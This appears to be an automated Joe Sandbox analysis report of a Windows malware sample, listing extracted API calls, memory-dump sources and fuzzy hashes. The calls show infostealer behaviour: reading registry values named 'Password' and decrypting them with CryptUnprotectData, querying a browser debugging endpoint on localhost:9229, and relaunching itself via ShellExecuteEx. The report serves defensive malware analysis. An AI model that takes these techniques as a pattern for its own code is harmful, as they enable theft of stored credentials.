                                                    • lstrlen.KERNEL32(00638DEC), ref: 024A1AA7
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 024A1ACE
                                                    • lstrcat.KERNEL32(00000000,00000000), ref: 024A1AD9
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 024A1B08
                                                    • lstrlen.KERNEL32(00435564), ref: 024A1B1A
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 024A1B3B
                                                    • lstrcat.KERNEL32(00000000,00435564), ref: 024A1B47
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 024A1B76
                                                    • lstrlen.KERNEL32(00638B1C), ref: 024A1B8C
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 024A1BB3
                                                    • lstrcat.KERNEL32(00000000,00000000), ref: 024A1BBE
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 024A1BED
                                                    • lstrlen.KERNEL32(00435564), ref: 024A1BFF
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 024A1C20
                                                    • lstrcat.KERNEL32(00000000,00435564), ref: 024A1C2C
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 024A1C5B
                                                    • lstrlen.KERNEL32(00638D70), ref: 024A1C71
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 024A1C98
                                                    • lstrcat.KERNEL32(00000000,00000000), ref: 024A1CA3
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 024A1CD2
                                                    • lstrlen.KERNEL32(00638D6C), ref: 024A1CE8
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 024A1D0F
                                                    • lstrcat.KERNEL32(00000000,00000000), ref: 024A1D1A
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 024A1D49
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpy$lstrcatlstrlen
                                                    • String ID:
                                                    • API String ID: 1049500425-0
                                                    • Opcode ID: 7d047b6832bef589f5634e053af651aa6ff54b82b49a647bfc4f6edddc21a2fc
                                                    • Instruction ID: 7aabf961189be78ab1bc53f483e7ec388398aa91d4bcaef5d8ceb9e6924df4ad
                                                    • Opcode Fuzzy Hash: 7d047b6832bef589f5634e053af651aa6ff54b82b49a647bfc4f6edddc21a2fc
                                                    • Instruction Fuzzy Hash: 3A9130B0601743ABD720EF79CC98A1BB7EAAF14349F14582EA85AC7350EB74D841DF60
                                                    APIs
                                                    • lstrcpy.KERNEL32(00000000,0042D01C), ref: 0249C11A
                                                    • lstrcpy.KERNEL32(00000000,0042D01C), ref: 0249C14D
                                                    • lstrlen.KERNEL32(004353D4), ref: 0249C158
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 0249C178
                                                    • lstrcat.KERNEL32(00000000,004353D4), ref: 0249C184
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 0249C1A7
                                                    • lstrcat.KERNEL32(00000000,00000000), ref: 0249C1B2
                                                    • lstrlen.KERNEL32(0043540C), ref: 0249C1BD
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 0249C1DA
                                                    • lstrcat.KERNEL32(00000000,0043540C), ref: 0249C1E6
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 0249C20D
                                                    • lstrlen.KERNEL32(00435410), ref: 0249C22D
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 0249C24F
                                                    • lstrcat.KERNEL32(00000000,00435410), ref: 0249C25B
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 0249C281
                                                    • ShellExecuteEx.SHELL32(?), ref: 0249C2D3
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpy$lstrcat$lstrlen$ExecuteShell
                                                    • String ID: <
                                                    • API String ID: 4016326548-4251816714
                                                    • Opcode ID: 948e5f2a0fe88fc6292e69687398adab40a5ba38be72b988fe604048f0edeb44
                                                    • Instruction ID: 86c2e6ea30061e07b26e7e980871d58ae72a9252c6940ed1eff1768821b595d9
                                                    • Opcode Fuzzy Hash: 948e5f2a0fe88fc6292e69687398adab40a5ba38be72b988fe604048f0edeb44
                                                    • Instruction Fuzzy Hash: 8D618E70A11295ABDF21FFB5CC88A5F7FA6AF08708F14442BE805E7211DBB4C5429FA4
                                                    APIs
                                                    • InternetOpenA.WININET(0042D01C,00000001,00000000,00000000,00000000), ref: 0040910F
                                                    • InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 0040912C
                                                    • InternetCloseHandle.WININET(00000000), ref: 00409139
                                                    • strlen.MSVCRT ref: 00409155
                                                    • InternetReadFile.WININET(?,?,?,00000000), ref: 00409196
                                                    • InternetReadFile.WININET(00000000,?,00001000,?), ref: 004091C7
                                                    • InternetCloseHandle.WININET(00000000), ref: 004091D2
                                                    • InternetCloseHandle.WININET(00000000), ref: 004091D9
                                                    • strlen.MSVCRT ref: 004091EA
                                                    • strlen.MSVCRT ref: 0040921D
                                                    • strlen.MSVCRT ref: 0040925E
                                                      • Part of subcall function 00417EB0: memchr.MSVCRT ref: 00417EEF
                                                      • Part of subcall function 00417EB0: memcmp.MSVCRT(00000000,?,?,?,"webSocketDebuggerUrl":,00000000), ref: 00417F09
                                                      • Part of subcall function 00417EB0: memchr.MSVCRT ref: 00417F28
                                                    • strlen.MSVCRT ref: 0040927C
                                                      • Part of subcall function 004089B0: std::_Xinvalid_argument.LIBCPMT ref: 004089C6
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1833400574.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000003.00000002.1833400574.0000000000443000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.000000000044B000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.000000000046E000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.000000000048E000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.0000000000493000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.00000000004CD000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.00000000004DA000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.00000000004F9000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.0000000000507000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.0000000000522000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.000000000055D000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.0000000000580000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.0000000000638000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Internet$strlen$CloseHandle$FileOpenReadmemchr$Xinvalid_argumentmemcmpstd::_
                                                    • String ID: "webSocketDebuggerUrl":$"ws://$http://localhost:9229/json
                                                    • API String ID: 4166274400-2144369209
                                                    • Opcode ID: 0c6aa3a70782f887abaeb98b790b0c8f3578e5d0b449c1f4a755a60c44504834
                                                    • Instruction ID: a7d092efa737f0fe45e53d089a45e304e661b41fe404ce77bc48f3d160830c15
                                                    • Opcode Fuzzy Hash: 0c6aa3a70782f887abaeb98b790b0c8f3578e5d0b449c1f4a755a60c44504834
                                                    • Instruction Fuzzy Hash: AD51C571B00205ABDB20DFA4DC45BDEF7F9DB48714F14416AF904E3281DBB8EA4587A9
                                                    APIs
                                                    • lstrcpy.KERNEL32(00000000,0042D01C), ref: 0248B687
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 0248B6D5
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 0248B700
                                                    • lstrcat.KERNEL32(00000000,00000000), ref: 0248B708
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 0248B730
                                                    • lstrlen.KERNEL32(00435214), ref: 0248B7A7
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 0248B7CB
                                                    • lstrcat.KERNEL32(00000000,00435214), ref: 0248B7D7
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 0248B800
                                                    • lstrlen.KERNEL32(00000000), ref: 0248B884
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 0248B8AE
                                                    • lstrcat.KERNEL32(00000000,00000000), ref: 0248B8B6
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 0248B8DE
                                                    • lstrlen.KERNEL32(0043509C), ref: 0248B955
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 0248B979
                                                    • lstrcat.KERNEL32(00000000,0043509C), ref: 0248B985
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 0248B9B5
                                                    • lstrlen.KERNEL32(?), ref: 0248BABE
                                                    • lstrlen.KERNEL32(?), ref: 0248BACD
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 0248BAF5
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpy$lstrlen$lstrcat
                                                    • String ID:
                                                    • API String ID: 2500673778-0
                                                    • Opcode ID: caf0e5c52129c9e0c170800c9da7536f1db1eb5a9e1db09bea434f579a2868c7
                                                    • Instruction ID: c3dbc2d54435531995dcddc48821acca4bc94dfc8a040e31e00f2051b776acdf
                                                    • Opcode Fuzzy Hash: caf0e5c52129c9e0c170800c9da7536f1db1eb5a9e1db09bea434f579a2868c7
                                                    • Instruction Fuzzy Hash: 18022E70A116069FDB25EF65C948A6EBBB2EF4470CF18806ED809DB361D775D842CF90
                                                    APIs
                                                      • Part of subcall function 024A7477: lstrcpy.KERNEL32(00000000,ERROR), ref: 024A7495
                                                    • RegOpenKeyExA.ADVAPI32(?,00638D44,00000000,00020019,?), ref: 024A39C4
                                                    • RegEnumKeyExA.ADVAPI32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 024A39FE
                                                    • wsprintfA.USER32 ref: 024A3A29
                                                    • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 024A3A47
                                                    • RegCloseKey.ADVAPI32(?), ref: 024A3A55
                                                    • RegCloseKey.ADVAPI32(?), ref: 024A3A5F
                                                    • RegQueryValueExA.ADVAPI32(?,00638DC0,00000000,000F003F,?,?), ref: 024A3AA8
                                                    • lstrlen.KERNEL32(?), ref: 024A3ABD
                                                    • RegQueryValueExA.ADVAPI32(?,00638BD0,00000000,000F003F,?,00000400), ref: 024A3B2E
                                                    • RegCloseKey.ADVAPI32(?), ref: 024A3B79
                                                    • RegCloseKey.ADVAPI32(?), ref: 024A3B90
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Close$OpenQueryValue$Enumlstrcpylstrlenwsprintf
                                                    • String ID: - $?
                                                    • API String ID: 13140697-712516993
                                                    • Opcode ID: edf0bac9685c6a4e32c5945965864e6577cf50905678e5db7fdfb665f3f8e1b6
                                                    • Instruction ID: c6319ad92b842c663b52901b2b2ecea667ffe338b1ec51c92780d3eba9bc2094
                                                    • Opcode Fuzzy Hash: edf0bac9685c6a4e32c5945965864e6577cf50905678e5db7fdfb665f3f8e1b6
                                                    • Instruction Fuzzy Hash: 28915FB29012589FCB10DFA4DC849DEBBBAFF48314F1485AEE509AB251E7319D45CF90
                                                    APIs
                                                    • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00407745
                                                    • RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 0040778A
                                                    • strlen.MSVCRT ref: 004077BE
                                                    • StrStrA.SHLWAPI(?,Password), ref: 004077F8
                                                    • strlen.MSVCRT ref: 0040788D
                                                      • Part of subcall function 00407690: GetProcessHeap.KERNEL32(00000008,00000400), ref: 0040769E
                                                      • Part of subcall function 00407690: HeapAlloc.KERNEL32(00000000), ref: 004076A5
                                                      • Part of subcall function 00407690: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 004076CD
                                                      • Part of subcall function 00407690: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 004076ED
                                                      • Part of subcall function 00407690: LocalFree.KERNEL32(?), ref: 004076F7
                                                    • strcpy_s.MSVCRT ref: 00407821
                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040782C
                                                    • HeapFree.KERNEL32(00000000), ref: 00407833
                                                    • strlen.MSVCRT ref: 00407840
                                                    • strcpy_s.MSVCRT ref: 0040786A
                                                    • strlen.MSVCRT ref: 004078B4
                                                    • RegEnumValueA.ADVAPI32(80000001,00000000,?,000000FF,00000000,00000003,?,?,80000001), ref: 00407975
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1833400574.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000003.00000002.1833400574.0000000000443000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.000000000044B000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.000000000046E000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.000000000048E000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.0000000000493000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.00000000004CD000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.00000000004DA000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.00000000004F9000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.0000000000507000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.0000000000522000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.000000000055D000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.0000000000580000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.0000000000638000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Heapstrlen$EnumFreeProcessValuestrcpy_s$AllocByteCharCryptDataLocalMultiOpenUnprotectWide
                                                    • String ID: Password
                                                    • API String ID: 3893107980-3434357891
                                                    • Opcode ID: 14964dbc208ebe2bd5570b721c02be0e9f6531da3a0e9e1e01ace35e59106e74
                                                    • Instruction ID: e4d9b8b39298a74cb5cd03489e7ec67c358bc82c244f10be08d5cfcaf05cec85
                                                    • Opcode Fuzzy Hash: 14964dbc208ebe2bd5570b721c02be0e9f6531da3a0e9e1e01ace35e59106e74
                                                    • Instruction Fuzzy Hash: 16810EB1D00219AFDB10DF95DC84ADEB7B9EF48300F10816AE505F7250EB75AA45CFA5
                                                    APIs
                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?), ref: 024A18E8
                                                    • lstrcpy.KERNEL32(00000000,00638C44), ref: 024A1913
                                                    • lstrlen.KERNEL32(?,?,?,?), ref: 024A1920
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 024A193D
                                                    • lstrcat.KERNEL32(00000000,?), ref: 024A194B
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 024A1971
                                                    • lstrlen.KERNEL32(00638AA8,?,?,?), ref: 024A1986
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 024A19A9
                                                    • lstrcat.KERNEL32(00000000,00638AA8), ref: 024A19B1
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 024A19D9
                                                    • ShellExecuteEx.SHELL32(?), ref: 024A1A14
                                                    • ExitProcess.KERNEL32 ref: 024A1A4A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpy$lstrcatlstrlen$ExecuteExitFileModuleNameProcessShell
                                                    • String ID: <
                                                    • API String ID: 3579039295-4251816714
                                                    • Opcode ID: 09672bfc39b299f7ced09603c6e6124d4d2c1ad6886d1f581e8bb92200c670ac
                                                    • Instruction ID: 49022ed202889c59c8f78524536b6dab712a68cd85727021c6d8bec9d49c5d92
                                                    • Opcode Fuzzy Hash: 09672bfc39b299f7ced09603c6e6124d4d2c1ad6886d1f581e8bb92200c670ac
                                                    • Instruction Fuzzy Hash: 5D515E7090165AAFDB11EFB5CC94A9EBBFEAF54304F04512AE909E3350DB74AA05CF90
                                                    APIs
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 0041F134
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 0041F162
                                                    • StrCmpCA.SHLWAPI(00000000,ERROR,?,?,?,?,?,?,?,?,?,?,?,?,0041F67A), ref: 0041F176
                                                    • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,0041F67A), ref: 0041F185
                                                    • LocalAlloc.KERNEL32(00000040,00000001,?,?,?,?,?,?,?,?,?,?,?,?,0041F67A), ref: 0041F1A3
                                                    • StrStrA.SHLWAPI(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0041F67A), ref: 0041F1D1
                                                    • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0041F67A), ref: 0041F1E4
                                                    • strtok.MSVCRT(00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,0041F67A), ref: 0041F1F6
                                                    • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041F67A), ref: 0041F202
                                                    • lstrcpy.KERNEL32(00000000,ERROR), ref: 0041F24F
                                                    • lstrcpy.KERNEL32(00000000,ERROR), ref: 0041F28F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1833400574.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1833400574.0000000000443000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.000000000044B000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.000000000046E000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.000000000048E000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.0000000000493000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.00000000004CD000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.00000000004DA000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.00000000004F9000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.0000000000507000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.0000000000522000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.000000000055D000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.0000000000580000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.0000000000638000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpy$lstrlen$AllocLocalstrtok
                                                    • String ID: ERROR
                                                    • API String ID: 2137491262-2861137601
                                                    • Opcode ID: 05761cc4364c42234ee252b2b5c3c3c7f577dcc16320945f4f877e0f0401f89e
                                                    • Instruction ID: 57b76eaee00c9718718f693bae5590ba1c15cb9a89fb7e987ba6136f15d61003
                                                    • Opcode Fuzzy Hash: 05761cc4364c42234ee252b2b5c3c3c7f577dcc16320945f4f877e0f0401f89e
                                                    • Instruction Fuzzy Hash: DB51D375A002019FCB20AF75CD49AAB77B5AF44314F04417AF849EB3A1DB78DC468BD8
                                                    APIs
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 0249F39B
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 0249F3C9
                                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 0249F3DD
                                                    • lstrlen.KERNEL32(00000000), ref: 0249F3EC
                                                    • LocalAlloc.KERNEL32(00000040,00000001), ref: 0249F40A
                                                    • StrStrA.SHLWAPI(00000000,?), ref: 0249F438
                                                    • lstrlen.KERNEL32(?), ref: 0249F44B
                                                    • strtok.MSVCRT(00000001,?), ref: 0249F45D
                                                    • lstrlen.KERNEL32(00000000), ref: 0249F469
                                                    • lstrcpy.KERNEL32(00000000,ERROR), ref: 0249F4B6
                                                    • lstrcpy.KERNEL32(00000000,ERROR), ref: 0249F4F6
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpy$lstrlen$AllocLocalstrtok
                                                    • String ID: ERROR
                                                    • API String ID: 2137491262-2861137601
                                                    • Opcode ID: 5b04030854d19af2b8db990e9c3e012bdc99472458b3ca0eed52a94b25b620b2
                                                    • Instruction ID: 58810328c4fb73da123c7c4718baa0c800fbe1020e8ab8ef1bd1dd6cdab2ddd0
                                                    • Opcode Fuzzy Hash: 5b04030854d19af2b8db990e9c3e012bdc99472458b3ca0eed52a94b25b620b2
                                                    • Instruction Fuzzy Hash: BB51AE719112916FCB21FF39CC48EAE7BA6AF85708F05451AEC09DBB11EB74D806CB90
                                                    APIs
                                                    • GetEnvironmentVariableA.KERNEL32(009483E8,00639BD8,0000FFFF), ref: 0040A086
                                                    • lstrcpy.KERNEL32(00000000,0042D01C), ref: 0040A0B3
                                                    • lstrlenA.KERNEL32(00639BD8), ref: 0040A0C0
                                                    • lstrcpy.KERNEL32(00000000,00639BD8), ref: 0040A0EA
                                                    • lstrlenA.KERNEL32(00435210), ref: 0040A0F5
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 0040A112
                                                    • lstrcatA.KERNEL32(00000000,00435210), ref: 0040A11E
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 0040A144
                                                    • lstrcatA.KERNEL32(00000000,00000000), ref: 0040A14F
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 0040A174
                                                    • SetEnvironmentVariableA.KERNEL32(009483E8,00000000), ref: 0040A18F
                                                    • LoadLibraryA.KERNEL32(0094F320), ref: 0040A1A3
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1833400574.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1833400574.0000000000443000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.000000000044B000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.000000000046E000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.000000000048E000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.0000000000493000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.00000000004CD000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.00000000004DA000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.00000000004F9000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.0000000000507000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.0000000000522000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.000000000055D000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.0000000000580000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.0000000000638000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                                                    • String ID:
                                                    • API String ID: 2929475105-0
                                                    • Opcode ID: e71572c05e61fd10cfa811daea49d805ade7cf6361090e2ab5aad4db3d6ecf1a
                                                    • Instruction ID: 94f9c8f72257bf504f41825e736cba288604a750adbbaa2107b6746afa8b652b
                                                    • Opcode Fuzzy Hash: e71572c05e61fd10cfa811daea49d805ade7cf6361090e2ab5aad4db3d6ecf1a
                                                    • Instruction Fuzzy Hash: E491B231600B009FC7209FA4DC44AA736A6EB44709F40517AF805AB3E1EBBDDD918BD6
                                                    APIs
                                                    • GetEnvironmentVariableA.KERNEL32(006388B4,00639BD8,0000FFFF), ref: 0248A2ED
                                                    • lstrcpy.KERNEL32(00000000,0042D01C), ref: 0248A31A
                                                    • lstrlen.KERNEL32(00639BD8), ref: 0248A327
                                                    • lstrcpy.KERNEL32(00000000,00639BD8), ref: 0248A351
                                                    • lstrlen.KERNEL32(00435210), ref: 0248A35C
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 0248A379
                                                    • lstrcat.KERNEL32(00000000,00435210), ref: 0248A385
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 0248A3AB
                                                    • lstrcat.KERNEL32(00000000,00000000), ref: 0248A3B6
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 0248A3DB
                                                    • SetEnvironmentVariableA.KERNEL32(006388B4,00000000), ref: 0248A3F6
                                                    • LoadLibraryA.KERNEL32(00638D78), ref: 0248A40A
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                                                    • String ID:
                                                    • API String ID: 2929475105-0
                                                    • Opcode ID: bace05496e01b1bd5bfa0f9a446348f260bebc96a6f440727fdd5c41bd0dc464
                                                    • Instruction ID: 896ba7f317dcafe886ad9cd4fc0695b11cd8b35f18dcb7dc61e31aff38a7851f
                                                    • Opcode Fuzzy Hash: bace05496e01b1bd5bfa0f9a446348f260bebc96a6f440727fdd5c41bd0dc464
                                                    • Instruction Fuzzy Hash: AB91CF70A20A209FD721BF65DC88AAF37A2EB44709B54042BE90587361EBF5D981CFD0
                                                    APIs
                                                    • lstrcpy.KERNEL32(00000000,0042D01C), ref: 0040BD0F
                                                    • lstrlenA.KERNEL32(00000000), ref: 0040BD42
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 0040BD6C
                                                    • lstrcatA.KERNEL32(00000000,00000000), ref: 0040BD74
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 0040BD9C
                                                    • lstrlenA.KERNEL32(0043509C), ref: 0040BE13
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1833400574.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1833400574.0000000000443000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.000000000044B000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.000000000046E000.00000040.00000001.01000000.00000006.sdmp
